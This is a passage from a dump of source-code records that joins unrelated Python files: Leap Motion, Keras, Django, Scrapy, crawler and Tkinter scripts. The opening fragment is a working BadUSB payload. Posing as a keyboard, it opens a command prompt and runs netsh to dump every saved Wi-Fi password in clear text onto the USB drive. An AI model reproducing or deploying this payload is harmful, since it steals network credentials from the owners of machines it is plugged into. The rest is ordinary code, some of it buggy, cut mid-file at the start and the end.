Keycode\nfrom adafruit_hid.keyboard import Keyboard\nfrom adafruit_hid.keyboard_layout_us import KeyboardLayoutUS\n\ntime.sleep(3)\n\nif not 'network.txt' in os.listdir():\n time.sleep(1.5)\n keyboard = Keyboard(usb_hid.devices)\n layout = KeyboardLayoutUS(keyboard)\n\n keyboard.send(Keycode.WINDOWS, Keycode.R)\n time.sleep(0.11)\n\n layout.write(\"cmd\\n\")\n\n time.sleep(0.17)\n\n layout.write(\"e:\\n\")\n time.sleep(0.05)\n\n layout.write(\"netsh wlan show profile * key=clear > network.txt\\n\")\n\n time.sleep(0.6)\n\n keyboard.send(Keycode.ALT, Keycode.F4)\n","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"331565815","text":"import os, sys,inspect, thread, time\nsys.path += [\"/usr/lib/Leap\", \"../lib/x64\", \"../lib\"]\nimport Leap\nfrom Leap import CircleGesture, KeyTapGesture, ScreenTapGesture, SwipeGesture\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom Leap import *;\n\nclass LeapListener(Leap.Listener):\n\n def on_init(self,controller):\n print(\"inited\");\n\n def on_connect(self,controller):\n controller.enable_gesture(Leap.Gesture.TYPE_CIRCLE);\n controller.enable_gesture(Leap.Gesture.TYPE_SWIPE);\n\n def on_exit(self,controller):\n print(\"exited\");\n\n def on_disconnect(self,controller):\n print(\"disconnect\");\n\n def on_frame(self, controller):\n print(\"on frame\")\n frame = controller.frame();\n global hands \n hands = frame.hands\n \nlistener = LeapListener();\n\ncontroller = Leap.Controller();\n\ncontroller.add_listener(listener)\n\ndef drawInit():\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n glViewport(0,0,640,480)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(-550,550,-550,550,-300,300)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\ndef arm_pos_gen(hand):\n yield hand.arm.wrist_position\n yield hand.arm.elbow_position\n\ndef drawSphere(radius,pos):\n glPushMatrix()\n OpenGL.GL.glTranslate(pos.x,pos.y,pos.z)\n color = [1.,0.,1.]\n glMaterialfv(GL_FRONT,GL_DIFFUSE,color)\n glutSolidSphere(radius,550,550)\n glPopMatrix()\n\ndef draw():\n drawInit()\n glColor3f(1,0,0)\n for hand in hands:\n for pos in arm_pos_gen(hand):\n drawSphere(20,pos)\n for finger in hand.fingers:\n for b in range(0,4):\n pos = finger.bone(b).center\n drawSphere(10,pos)\n glutSwapBuffers()\n\ndef main1():\n glutInit();\n glutInitDisplayMode(GLUT_DOUBLE|GLUT_ALPHA|GLUT_DEPTH)\n glutInitWindowSize(640,480)\n glutInitWindowPosition(0,0)\n windows = glutCreateWindow(\"testWindow\")\n glClearColor(0.,0.,0.,1.)\n glShadeModel(GL_SMOOTH)\n glEnable(GL_CULL_FACE)\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_LIGHTING);\n glEnable(GL_LIGHT0);\n\n ambientLight = [ 0.2, 0.2, 0.2, 1.0 ];\n diffuseLight = [ 0.8, 0., 0., 1.0 ] \n specularLight = [ 1.0, 0, 0, 1.0 ]\n position =[ -0, 1.0,400.0, 1.0 ]\n\n glLightfv(GL_LIGHT0, GL_AMBIENT, ambientLight);\n glLightfv(GL_LIGHT0, GL_DIFFUSE, diffuseLight);\n glLightfv(GL_LIGHT0, GL_SPECULAR, specularLight);\n glLightfv(GL_LIGHT0, GL_POSITION, position);\n glutDisplayFunc(draw)\n glutIdleFunc(draw)\n glutMainLoop()\n\nif __name__ == \"__main__\":\n main()\n controller.remove_listener(listener);\n","sub_path":"leap.py","file_name":"leap.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"417778265","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom tensorflow.keras 
import callbacks\nfrom tensorflow.keras.optimizers import schedules\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.losses import sparse_categorical_crossentropy\nfrom tensorflow.keras.optimizers import Adam\nfrom sklearn.model_selection import KFold\nfrom os import listdir\nimport json\nfrom os import path as ospath\n\n# a simple custom activation\ndef mapping_to_target_range(x, target_min=0, target_max=500):\n from tensorflow.keras import backend as BK\n x02 = BK.tanh(x)+1 # x in range(0,2)\n scale = (target_max-target_min)/2.\n return x02*scale+target_min\n\ndef graph(histories, tight_layout=False, holdoutscores=None):\n fig, axs = plt.subplots(nrows=1, ncols=len(histories), figsize=(20, 5))\n n = 0\n for ax, kmodel in zip(axs, histories.items()):\n epochs = range(1, kmodel[1].params['epochs']+1)\n ax.plot(epochs, kmodel[1].history['loss'])\n ax.plot(epochs, kmodel[1].history['val_loss'])\n if holdoutscores!=None: ax.axhline(y=holdoutscores[n], color='r', linestyle='-')\n ax.set_yscale('log')\n ax.set_ylabel('loss')\n ax.set_xlabel('epochs')\n ax.legend(['loss', 'val_loss', 'holdoutscore'], loc='upper left')\n if holdoutscores!=None: ax.set_title(f'{kmodel[0]} model loss, holdout: {round(holdoutscores[n], 2)}')\n else: ax.set_title(f'{kmodel[0]} model loss')\n n += 1\n if tight_layout==True: plt.tight_layout()\n plt.show()\n\ndef get_callbacks():\n return [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=100, min_lr=0.0001, verbose=1),\n callbacks.EarlyStopping(monitor='val_loss', min_delta=0, patience=1000, verbose=0, mode='auto', baseline=None, restore_best_weights=False)]\n\ndef model_duilder_kfold(xdim, ydim, model='v1', num_folds=5, loss_function='mean_squared_error',\n optimizer='adam', reshuffle=False):\n # define the model architecture\n for k in range(0, num_folds):\n #shallow model\n if model == 'v1':\n model = Sequential()\n model.add(Dense(270, activation='relu', input_dim=xdim))\n model.add(Dropout(0.2))\n model.add(Dense(135, activation='relu'))\n model.add(Dropout(0.1))\n #model.add(Dense(1, activation=mapping_to_target_range))\n #model.add(Lambda(lambda x: x * [2]))\n model.add(Dense(ydim))\n \n # deep model\n elif model == 'v2':\n model = Sequential([\n Dense(2048, kernel_regularizer=regularizers.l2(0.001),\n activation='relu', input_dim=xdim),\n Dropout(0.2),\n Dense(1024, kernel_regularizer=regularizers.l2(0.001),\n activation='relu'),\n Dropout(0.1),\n Dense(512, kernel_regularizer=regularizers.l2(0.001),\n activation='relu'),\n Dropout(0.01),\n Dense(ydim)])\n model.compile(loss = loss_function, optimizer = optimizer)\n # save model\n path = '_Kfolds_models'\n model.save(f'./{path}/k{k+1}_model.h5')\n return path\n\ndef model_saver_kfold(models):\n # load saved model from file\n val = input(\"Saver trained models (y/n): \")\n if val.startswith(('Y', 'y')):\n for model_name, model in models.items():\n # save model\n model.save(f'./_Kfolds_models/{model_name}.h5')\n\ndef model_loader_kfold(path=None, ext=False):\n try:\n models = {}\n for filename in listdir(path):\n if ext==False: name = filename.rpartition('.')[0].replace(' ', '_')\n else: name =filename.replace(' ', '_')\n if filename.endswith('.h5'):\n models[name] = load_model(path+'\\\\'+filename)\n return models\n except:\n print ('No models loaded for \\\\',path)\n\ndef model_kfold(x, y, holdout=None, model='v1', num_folds=5, 
batch_size=None, steps_per_epoch=20, loss_function='mean_squared_error', optimizer='adam', max_epochs=100, verbosity=1, workers=6,\n use_multiprocessing=True, continue_training=False, save_models_afte_training=True, plot_results=True, reshuffle=False, random_state=42, path=None):\n # setting local variables\n if 'histories' not in locals(): histories = {}\n #setting up working directory\n if path==None: path = '_Kfolds_models'\n\n # define the K-fold Cross Validator\n kfold = KFold(n_splits=num_folds, random_state=random_state, shuffle=True)\n\n # storing ksets\n ksets = {}\n count = 1\n for test, train in kfold.split(x):\n ksets['k{}'.format(count)] = {}\n ksets['k{}'.format(count)]['train'] = train.tolist()\n ksets['k{}'.format(count)]['test'] = test.tolist()\n count += 1\n print(len(ksets) == num_folds)#assert we have the same number of splits\n #dump ksets to json\n \n\n #loading previous ksets oder\n if ospath.exists(f'./{path}/ksets.json')==True and reshuffle==False:\n with open(f'./{path}/ksets.json') as f: ksets = json.load(f)\n\n # create fesh modelsn\n if continue_training==False:\n path = model_duilder_kfold(x.shape[1], len(y.shape), model=model, num_folds=num_folds, loss_function=loss_function,\n optimizer=optimizer)\n if reshuffle==False:\n with open(f'./{path}/ksets.json', 'w') as fp: json.dump(ksets, fp)\n\n #load models\n models = model_loader_kfold(path=path, ext=False)\n\n # K-fold Cross Validation model evaluation\n fold_no = 1\n holdoutscores =[]\n for k, kset in ksets.items():\n model_key = str(f'{k}_model')\n train = kset['train']\n test = kset['test']\n # generate a print\n print('------------------------------------------------------------------------')\n print(f'Training for fold {fold_no} ...')\n # running models\n histories[model_key] = models[model_key].fit(x[train], y[train],\n batch_size = batch_size,\n steps_per_epoch = steps_per_epoch,\n epochs = max_epochs,\n validation_data = (x[test],y[test]),\n callbacks = get_callbacks(),\n verbose = verbosity,\n workers = workers,\n use_multiprocessing = use_multiprocessing)\n # generate generalization metrics\n if holdout!= None:\n hscore = models[model_key].evaluate(holdout[0], holdout[1], verbose=0)\n print(f'Holdout score for fold {fold_no}: {models[model_key].loss}: {hscore}')\n holdoutscores.append(hscore)\n # increase fold number\n fold_no = fold_no + 1\n \n # plot results\n if plot_results==True: graph(histories, tight_layout=True, holdoutscores=holdoutscores)\n\n # save trained models\n if save_models_afte_training==True: model_saver_kfold(models)\n\n #output trained model\n return models, histories, holdoutscores\n\ndef main ():\n # loading train and validation sets in binary format\n train_x = np.load('train_x.npy')\n holdout_x = np.load('holdout_x.npy')\n train_y = np.load('train_y.npy')\n holdout_y = np.load('holdout_y.npy')\n # run kfolds\n models, histories, holdoutscores = model_kfold(train_x, train_y, holdout=[holdout_x,holdout_y])\n pass\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"kfold_model.py","file_name":"kfold_model.py","file_ext":"py","file_size_in_byte":7655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"61400678","text":"# Authur: Xiukun Hunag\r\n# Date: Mar., 2016\r\nimport os\r\nimport json\r\nvideo_dic ={}\r\nif os.path.isdir('./folder_of_change_name_inf')==False:\r\n os.mkdir('./folder_of_change_name_inf')\r\nfor folder in os.listdir('./folder_of_video'): \r\n i =1\r\n video_dic[folder] =[]\r\n 
os.chdir('./folder_of_video/'+folder)\r\n    for video in os.listdir('.'):\r\n        name = str(i).rjust(6, '0') + '.mp4'\r\n        video_dic[folder].append(video + '!!!!!!' + name)\r\n        os.rename(video, name)\r\n        i += 1\r\n    os.chdir('..')\r\n    os.chdir('..')\r\n    video_dic_json = json.dumps(video_dic[folder])\r\n    filename = './folder_of_change_name_inf/' + folder + '.json'\r\n    with open(filename, 'w') as f:\r\n        f.write(video_dic_json)\r\n","sub_path":"change_video_name.py","file_name":"change_video_name.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"469283436","text":"import matplotlib.pyplot as plt\nfrom PIL import Image\nimport numpy as np\n\nimg1 = Image.open('Flair/0001_090.png')\nimg1_mat = np.array(img1, dtype=float)\nimg2 = Image.open('T1/0001_090.png')\nimg2_mat = np.array(img2, dtype=float)\n\nplt.imshow(img1_mat, cmap='gray')\nplt.show()\n\nimg1_prob = img1_mat / 127.0 - 1\nimg2_prob = img2_mat / 127.0 - 1\n\n# define the bin size before it is used below\ncell_range = 16\nbins_num = 256 // cell_range\n\nmat_index = np.int32(img1_mat / cell_range)\nmat_feature = img2_prob - img1_prob\n\nbins_idx = np.zeros(bins_num)\nfor idx in range(bins_num):\n    num = np.sum(mat_index == idx)\n    if num > 0:\n        bins_idx[idx] = np.mean(mat_feature[mat_index == idx])\n\nplt.plot(bins_idx)\nplt.savefig('tmp.png')\n","sub_path":"analysis_plot.py","file_name":"analysis_plot.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"366885654","text":"from scrapy.utils.url import urljoin_rfc\n\ndef link(link_sel, base_url=\"\"):\n    \"\"\"\n    takes a link selector and returns a tuple of (text, url)\n    base_url will be used to construct absolute urls from relative ones if\n    provided\n    \"\"\"\n    txt = link_sel.select(\"text()\").extract()[0].strip()\n    url = link_sel.select(\"@href\").extract()[0]\n    if base_url:\n        url = urljoin_rfc(base_url, url)\n    return (txt, url)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"94217066","text":"from django.views.generic import TemplateView, FormView\n\nfrom .models import DeliveryType\nfrom .forms import LetterForm, LetterOnlyDeliveryForm\n\n\nclass TypeListView(TemplateView):\n    template_name = \"delivery_letter/type_list.html\"\n\n    def get_context_data(self, **kwargs):\n        kwargs['delivery_type_list'] = DeliveryType.objects.all()\n        return super().get_context_data(**kwargs)\n\n\nclass LetterBaseFormView(FormView):\n    template_name = 'delivery_letter/delivery.html'\n    success_url = '/'\n\n    def form_valid(self, form):\n        form.save()\n        return super().form_valid(form)\n\n\nclass LetterFormView(LetterBaseFormView):\n    form_class = LetterForm\n\n\nclass LetterOnlyDeliveryFormView(LetterBaseFormView):\n    form_class = LetterOnlyDeliveryForm\n\n\n\n","sub_path":"direct_mail/services/delivery_letter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"653295964","text":"\nif __name__ == \"__main__\":\n\timport logSetup\n\tlogSetup.initLogging()\n\nimport WebMirror.rules\nimport WebMirror.util.urlFuncs as urlFuncs\nimport time\nimport multiprocessing\nimport signal\nimport logging\nimport traceback\nimport WebMirror.Engine\nimport runStatus\nimport queue\nimport sqlalchemy.exc\nimport 
WebMirror.database as db\n\nimport WebMirror.OutputFilters.AmqpInterface\nimport config\nimport os.path\n\n\nfrom sqlalchemy.sql import text\nfrom sqlalchemy.sql import func\n\nPROCESSES = 24\n# PROCESSES = 16\n# PROCESSES = 4\n# PROCESSES = 2\n# PROCESSES = 1\n\n# For synchronizing saving cookies to disk\ncookie_lock = multiprocessing.Lock()\njob_get_lock = multiprocessing.Lock()\n\ndef halt_exc(x, y):\n\tif runStatus.run_state.value == 0:\n\t\tprint(\"Raising Keyboard Interrupt\")\n\t\traise KeyboardInterrupt\n\nclass RunInstance(object):\n\tdef __init__(self, num, rules, response_queue, nosig=True):\n\t\tprint(\"RunInstance %s init!\" % num)\n\t\tif nosig:\n\t\t\tsignal.signal(signal.SIGINT, signal.SIG_IGN)\n\t\tself.num = num\n\t\tself.log = logging.getLogger(\"Main.Text.Web\")\n\n\t\tself.archiver = WebMirror.Engine.SiteArchiver(cookie_lock, job_get_lock=job_get_lock, response_queue=response_queue)\n\t\tprint(\"RunInstance %s MOAR init!\" % num)\n\n\n\tdef do_task(self):\n\t\tself.archiver.taskProcess()\n\n\tdef go(self):\n\t\tself.log.info(\"RunInstance starting!\")\n\t\tloop = 0\n\t\twhile 1:\n\t\t\tif runStatus.run_state.value == 1:\n\t\t\t\tself.do_task()\n\t\t\telse:\n\t\t\t\tself.log.info(\"Thread %s exiting.\", self.num)\n\t\t\t\tbreak\n\t\t\tloop += 1\n\n\t\t\tif loop == 15:\n\t\t\t\tloop = 0\n\t\t\t\tself.log.info(\"Thread %s awake. Runstate: %s\", self.num, runStatus.run_state.value)\n\n\n\n\n\n\t@classmethod\n\tdef run(cls, num, rules, response_queue, nosig=True):\n\t\tprint(\"Running!\")\n\t\ttry:\n\t\t\trun = cls(num, rules, response_queue, nosig)\n\t\t\tprint(\"Class instantiated: \", run)\n\t\t\trun.go()\n\t\texcept Exception:\n\t\t\tprint()\n\t\t\tprint(\"Exception in sub-process!\")\n\t\t\ttraceback.print_exc()\n\ndef initializeStartUrls(rules):\n\tprint(\"Initializing all start URLs in the database\")\n\n\tfor ruleset in [rset for rset in rules if rset['starturls']]:\n\t\tfor starturl in ruleset['starturls']:\n\t\t\thave = db.get_session().query(db.WebPages) \\\n\t\t\t\t.filter(db.WebPages.url == starturl) \\\n\t\t\t\t.count()\n\t\t\tif not have:\n\t\t\t\tnetloc = urlFuncs.getNetLoc(starturl)\n\t\t\t\tnew = db.WebPages(\n\t\t\t\t\t\turl = starturl,\n\t\t\t\t\t\tstarturl = starturl,\n\t\t\t\t\t\tnetloc = netloc,\n\t\t\t\t\t\ttype = ruleset['type'],\n\t\t\t\t\t\tpriority = db.DB_IDLE_PRIORITY,\n\t\t\t\t\t\tdistance = db.DB_DEFAULT_DIST,\n\t\t\t\t\t\tnormal_fetch_mode = ruleset['normal_fetch_mode'],\n\t\t\t\t\t)\n\t\t\t\tprint(\"Missing start-url for address: '{}'\".format(starturl))\n\t\t\t\tdb.get_session().add(new)\n\t\tdb.get_session().commit()\n\n\ndef resetInProgress():\n\tprint(\"Resetting any stalled downloads from the previous session.\")\n\n\t# db.get_session().begin()\n\tdb.get_session().query(db.WebPages) \\\n\t\t.filter((db.WebPages.state == \"fetching\") | (db.WebPages.state == \"processing\")) \\\n\t\t.update({db.WebPages.state : \"new\"})\n\tdb.get_session().commit()\n\n\nclass UpdateAggregator(object):\n\tdef __init__(self, msg_queue):\n\t\tself.queue = msg_queue\n\t\tself.log = logging.getLogger(\"Main.Agg.Manager\")\n\n\t\tamqp_settings = {\n\t\t\t\"RABBIT_LOGIN\" : config.C_RABBIT_LOGIN,\n\t\t\t\"RABBIT_PASWD\" : config.C_RABBIT_PASWD,\n\t\t\t\"RABBIT_SRVER\" : config.C_RABBIT_SRVER,\n\t\t\t\"RABBIT_VHOST\" : config.C_RABBIT_VHOST,\n\t\t}\n\n\t\tif config.C_DO_RABBIT:\n\t\t\tself._amqpint = WebMirror.OutputFilters.AmqpInterface.RabbitQueueHandler(amqp_settings)\n\n\t\tself.seen = {}\n\n\t\tself.links = 
0\n\t\tself.amqpUpdateCount = 0\n\t\tself.deathCounter = 0\n\n\t\tself.batched_links = []\n\n\tdef do_amqp(self, pkt):\n\t\tself.amqpUpdateCount += 1\n\n\t\tif self.amqpUpdateCount % 50 == 0:\n\t\t\tself.log.info(\"Transmitted AMQP messages: %s\", self.amqpUpdateCount)\n\t\tself._amqpint.put_item(pkt)\n\n\n\n\n\tdef do_link_batch_update(self):\n\t\tif not self.batched_links:\n\t\t\treturn\n\n\t\tself.log.info(\"Inserting %s items into DB in batch.\", len(self.batched_links))\n\t\twhile 1:\n\t\t\ttry:\n\n\t\t\t\tcmd = text(\"\"\"\n\t\t\t\t\t\tINSERT INTO\n\t\t\t\t\t\t\tweb_pages\n\t\t\t\t\t\t\t(url, starturl, netloc, distance, is_text, priority, type, fetchtime, state)\n\t\t\t\t\t\tVALUES\n\t\t\t\t\t\t\t(:url, :starturl, :netloc, :distance, :is_text, :priority, :type, :fetchtime, :state)\n\t\t\t\t\t\tON CONFLICT DO NOTHING\n\t\t\t\t\t\t\"\"\")\n\t\t\t\tfor paramset in self.batched_links:\n\t\t\t\t\tdb.get_session().execute(cmd, params=paramset)\n\t\t\t\tdb.get_session().commit()\n\t\t\t\tself.batched_links = []\n\t\t\t\tbreak\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tself.log.info(\"Keyboard Interrupt?\")\n\t\t\t\tdb.get_session().rollback()\n\t\t\texcept sqlalchemy.exc.InternalError:\n\t\t\t\tself.log.info(\"Transaction error. Retrying.\")\n\t\t\t\ttraceback.print_exc()\n\t\t\t\tdb.get_session().rollback()\n\t\t\texcept sqlalchemy.exc.OperationalError:\n\t\t\t\tself.log.info(\"Transaction error. Retrying.\")\n\t\t\t\ttraceback.print_exc()\n\t\t\t\tdb.get_session().rollback()\n\n\n\tdef do_link(self, linkdict):\n\t\t# print(\"Link upsert!\")\n\t\t# Linkdict structure\n\t\t# new = {\n\t\t# \t'url' : link,\n\t\t# \t'starturl' : job.starturl,\n\t\t# \t'netloc' : start,\n\t\t# \t'distance' : job.distance+1,\n\t\t# \t'is_text' : istext,\n\t\t# \t'priority' : job.priority,\n\t\t# \t'type' : job.type,\n\t\t# \t'state' : \"new\",\n\t\t# \t'fetchtime' : datetime.datetime.now(),\n\t\t# }\n\n\t\tassert 'url' in linkdict\n\t\tassert 'starturl' in linkdict\n\t\tassert 'netloc' in linkdict\n\t\tassert 'distance' in linkdict\n\t\tassert 'is_text' in linkdict\n\t\tassert 'priority' in linkdict\n\t\tassert 'type' in linkdict\n\t\tassert 'state' in linkdict\n\t\tassert 'fetchtime' in linkdict\n\n\t\turl = linkdict['url']\n\n\t\tif not url in self.seen:\n\t\t\t# Fucking huzzah for ON CONFLICT!\n\t\t\tself.batched_links.append(linkdict)\n\t\t\tself.seen[url] = True\n\n\t\t\tif len(self.batched_links) > 100:\n\t\t\t\tself.do_link_batch_update()\n\n\t\t# else:\n\t\t# \tprint(\"Old item: %s\", linkdict)\n\n\tdef do_task(self):\n\n\t\ttarget, value = self.queue.get_nowait()\n\n\t\tif (self.links % 50) == 0:\n\t\t\tself.log.info(\"Aggregator active. 
Total cached URLs: %s, Items in processing queue: %s, transmitted release messages: %s.\", len(self.seen), self.queue.qsize(), self.amqpUpdateCount)\n\n\t\tself.links += 1\n\n\t\tif target == \"amqp_msg\":\n\t\t\tif config.C_DO_RABBIT:\n\t\t\t\tself.do_amqp(value)\n\t\telif target == \"new_link\":\n\t\t\tself.do_link(value)\n\t\telse:\n\t\t\tprint(\"Todo\", target, value)\n\n\tdef run(self):\n\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\tself.do_task()\n\t\t\t\tself.deathCounter = 0\n\t\t\texcept queue.Empty:\n\t\t\t\tif runStatus.agg_run_state.value == 1:\n\t\t\t\t\t# Fffffuuuuu time.sleep barfs on KeyboardInterrupt\n\t\t\t\t\ttry:\n\t\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\t\tself.do_link_batch_update()\n\t\t\t\t\texcept KeyboardInterrupt:\n\t\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tself.do_link_batch_update()\n\t\t\t\t\tself.deathCounter += 1\n\t\t\t\t\ttime.sleep(0.1)\n\t\t\t\t\tif self.deathCounter > 5:\n\t\t\t\t\t\tself.log.info(\"Aggregator thread exiting.\")\n\t\t\t\t\t\tbreak\n\t\t\texcept Exception:\n\t\t\t\tself.log.error(\"Exception in aggregator!\")\n\t\t\t\t# iterate the traceback line-by-line (iterating the bare string would log single characters)\n\t\t\t\tfor line in traceback.format_exc().splitlines():\n\t\t\t\t\tself.log.error(line.rstrip())\n\nclass Crawler(object):\n\tdef __init__(self):\n\t\tself.log = logging.getLogger(\"Main.Text.Manager\")\n\t\tself.rules = WebMirror.rules.load_rules()\n\t\tself.agg_queue = multiprocessing.Queue()\n\n\tdef start_aggregator(self):\n\n\t\tagg = UpdateAggregator(self.agg_queue)\n\t\tself.agg_proc = multiprocessing.Process(target=agg.run)\n\t\tself.agg_proc.start()\n\n\tdef join_aggregator(self):\n\n\t\tself.log.info(\"Asking Aggregator process to stop.\")\n\t\trunStatus.agg_run_state.value = 0\n\t\tself.agg_proc.join(0)\n\t\tself.log.info(\"Aggregator joined.\")\n\n\tdef run(self):\n\n\t\ttasks = []\n\t\tcnt = 0\n\t\tprocno = 0\n\n\t\tself.start_aggregator()\n\n\t\tif PROCESSES == 1:\n\t\t\tself.log.info(\"Running in single process mode!\")\n\t\t\ttry:\n\t\t\t\tRunInstance.run(procno, self.rules, self.agg_queue, nosig=False)\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\trunStatus.run_state.value = 0\n\n\n\t\telif PROCESSES < 1:\n\t\t\tself.log.error(\"Wat?\")\n\t\telif PROCESSES > 1:\n\t\t\ttry:\n\t\t\t\twhile runStatus.run_state.value:\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\t\tcnt += 1\n\t\t\t\t\tif cnt == 10:\n\t\t\t\t\t\tcnt = 0\n\t\t\t\t\t\tliving = sum([task.is_alive() for task in tasks])\n\t\t\t\t\t\tfor dummy_x in range(PROCESSES - living):\n\t\t\t\t\t\t\tself.log.warning(\"Insufficient living child threads! 
Creating another thread with number %s\", procno)\n\t\t\t\t\t\t\tproc = multiprocessing.Process(target=RunInstance.run, args=(procno, self.rules, self.agg_queue))\n\t\t\t\t\t\t\ttasks.append(proc)\n\t\t\t\t\t\t\tproc.start()\n\t\t\t\t\t\t\tprocno += 1\n\t\t\t\t\t\tself.log.info(\"Living processes: %s\", living)\n\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\trunStatus.run_state.value = 0\n\n\t\t\tself.log.info(\"Crawler allowing ctrl+c to propagate.\")\n\t\t\ttime.sleep(1)\n\t\t\trunStatus.run_state.value = 0\n\n\n\t\t\tself.log.info(\"Crawler waiting on executor to complete: Runstate = %s\", runStatus.run_state.value)\n\t\t\twhile 1:\n\t\t\t\tliving = sum([task.is_alive() for task in tasks])\n\t\t\t\t[task.join(3.0/(living+1)) for task in tasks]\n\t\t\t\tself.log.info(\"Living processes: '%s'\", living)\n\t\t\t\tif living == 0:\n\t\t\t\t\tbreak\n\n\n\n\n\t\t\tself.log.info(\"All processes halted.\")\n\t\tself.join_aggregator()\n\n\nif __name__ == \"__main__\":\n\trunner = Crawler()\n\trunner.run()\n\tprint(runner)\n\n","sub_path":"WebMirror/Runner.py","file_name":"Runner.py","file_ext":"py","file_size_in_byte":8936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"199274882","text":"import tkinter as tk\r\nfrom tkinter import ttk, messagebox\r\nimport requests\r\nimport socket\r\nimport os\r\n\r\n\r\ndef is_connected():\r\n try:\r\n socket.create_connection((\"www.google.com\", 80))\r\n return 1\r\n except OSError:\r\n return 0\r\n\r\n\r\ndef show_entry_fields():\r\n try:\r\n if(is_connected()):\r\n country = e1.get()\r\n request = requests.get(\r\n f\"https://disease.sh/v3/covid-19/countries/{country.lower()}\")\r\n country = request.json()['country']\r\n\r\n def operation(items):\r\n return \"+\" if request.json()[items] != 0 else \"\"\r\n print(\r\n f\"https://disease.sh/v3/covid-19/countries/{country.capitalize()}\")\r\n window = tk.Tk()\r\n window.title(f\"Covid-19 {country}\")\r\n window.geometry('1000x500')\r\n lbl = ttk.Label(\r\n window, text=f\"New cases today : {operation('todayCases')}{request.json()['todayCases']:,d}\")\r\n lbl.pack()\r\n lbl2 = ttk.Label(\r\n window, text=f\"New recovered today : {operation('todayRecovered')}{request.json()['todayRecovered']:,d}\")\r\n lbl2.pack()\r\n lbl3 = ttk.Label(\r\n window, text=f\"New death today : {operation('todayDeaths')}{request.json()['todayDeaths']:,d}\")\r\n lbl3.pack()\r\n lbl4 = ttk.Label(\r\n window, text=f\"Total Cases : {request.json()['cases']:,d}\")\r\n lbl4.pack()\r\n lbl5 = ttk.Label(\r\n window, text=f\"Total Recovered : {request.json()['recovered']:,d}\")\r\n lbl5.pack()\r\n lbl6 = ttk.Label(\r\n window, text=f\"Total Death : {request.json()['deaths']:,d}\")\r\n lbl6.pack()\r\n lbl7 = ttk.Label(\r\n window, text=f\"Active Cases : {request.json()['active']:,d}\")\r\n lbl7.pack()\r\n lbl8 = ttk.Label(\r\n window, text=f\"Critical cases : {request.json()['critical']:,d}\")\r\n lbl8.pack()\r\n master.destroy()\r\n else:\r\n messagebox.showerror(\r\n \"Error\", \"An error occurred in the internet connection\")\r\n except:\r\n messagebox.showerror(\r\n \"Error\", \"An error occurred getting the information. 
Check Your Country\")\r\n\r\n\r\nmaster = tk.Tk()\r\nmaster.title(\"Covid-19\")\r\nmaster.geometry('1000x500')\r\ntk.Label(master, text=\"Country\", font='Helvetica 50 bold').pack()\r\ne1 = tk.Entry(master)\r\ne1.pack()\r\ntk.Button(master, text='Show', command=show_entry_fields).pack()\r\nl1 = tk.Label(master, text=\"Coded By fagun\")\r\nl1.pack()\r\ntk.mainloop()","sub_path":"covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"525982711","text":"\nfrom django.shortcuts import render\n\n# # from django.shortcuts import get_object_or_404\n# from django.http import HttpResponseRedirect\n# from django.urls import reverse\nimport datetime\nfrom django.contrib.auth.decorators import permission_required\n\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.urls import reverse_lazy\nfrom .models import Book, Author, BookInstance\nfrom django.views import generic\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\n\n\ndef index(request):\n    \"\"\"View function for home page of site.\"\"\"\n    # Generate counts of some of the main objects\n    num_books = Book.objects.all().count()\n    num_instances = BookInstance.objects.all().count()\n    # # Available copies of books\n    num_instances_available = \\\n        BookInstance.objects.filter(status__exact='a').count()\n    num_authors = Author.objects.count()  # The 'all()' is implied by default.\n\n    # Number of visits to this view, as counted in the session variable.\n    # num_visits = request.session.get('num_visits', 0)\n    # request.session['num_visits'] = num_visits + 1\n\n    # Render the HTML template index.html\n    # with the data in the context variable.\n    return render(request, 'index.html', context={\n        'num_books': num_books,\n        'num_instances': num_instances,\n        'num_instances_available': num_instances_available,\n        'num_authors': num_authors, }\n    )\n\n\nclass BookListView(generic.ListView):\n    \"\"\"Generic class-based view for a list of books.\"\"\"\n    model = Book\n    paginate_by = 2\n\n\nclass BookDetailView(generic.DetailView):\n    \"\"\"Generic class-based detail view for a book.\"\"\"\n    model = Book\n\n\nclass 